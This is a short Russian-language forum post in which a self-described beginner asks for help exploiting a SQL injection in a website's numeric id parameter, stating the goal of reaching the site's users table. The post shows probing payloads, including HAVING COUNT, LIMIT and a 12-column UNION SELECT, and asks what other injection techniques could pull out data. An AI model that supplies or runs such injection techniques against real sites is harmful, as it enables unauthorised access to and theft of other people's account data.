Cosmologist
Сообщений: 1
Оценки: 0
Присоединился: 2011-03-06 19:38:23.140000
|
Запрос имеет вид
select * from `aren_razdel` t where t.type = 0 and t.id = 106
число 106 берется из запроса, в значении экранируются только кавычки - хотелось бы получить доступ к таблице с пользователями.
Минус в том что движок по каким то своим понятиям не всегда выводит данные на страницу при при использовании инъекции, поясню:
select * from `aren_razdel` t where t.type = 0 and t.id = 106 and having count(*) = 1 - данные выводятся и при этом видно что исходный запрос возвращает одну строку
но
select * from `aren_razdel` t where t.type = 0 and t.id = 106 limit 1 - данные не выводятся на страницу и SQL-ошибка не возникает
также
select * from `aren_razdel` t where t.type = 0 and t.id = 106
union
select 1,2,3,4,5,6,7,8,9,10,11,12 - данные также не выводятся (с помощью having определил что столбцов 12)
Какие варианты использования инъекции есть еще?
|
Помогите использовать инъекцию новичку - 
